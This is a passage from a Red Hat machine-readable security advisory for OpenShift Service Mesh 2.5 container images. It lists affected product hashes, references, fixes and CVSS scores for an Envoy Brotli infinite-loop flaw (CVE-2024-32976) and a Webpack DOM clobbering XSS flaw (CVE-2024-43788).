"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-32976", }, { category: "external", summary: "RHBZ#2283145", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2283145", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-32976", url: "https://www.cve.org/CVERecord?id=CVE-2024-32976", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-32976", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-32976", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-7wp5-c2vq-4f8m", url: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-7wp5-c2vq-4f8m", }, ], release_date: "2024-06-04T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:53+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7725", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "envoy: Brotli decompressor infinite loop", }, { cve: "CVE-2024-43788", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-08-27T17:20:06.890123+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2308193", }, ], notes: [ { category: "description", text: "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.", title: "Vulnerability description", }, { category: "summary", text: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", title: "Vulnerability summary", }, { category: "other", text: "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "RHBZ#2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43788", url: "https://www.cve.org/CVERecord?id=CVE-2024-43788", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", }, { category: "external", summary: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", url: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { category: "external", summary: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { category: "external", summary: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { category: "external", summary: "https://scnps.co/papers/sp23_domclob.pdf", url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], release_date: "2024-08-27T17:15:07.967000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:53+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7725", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", 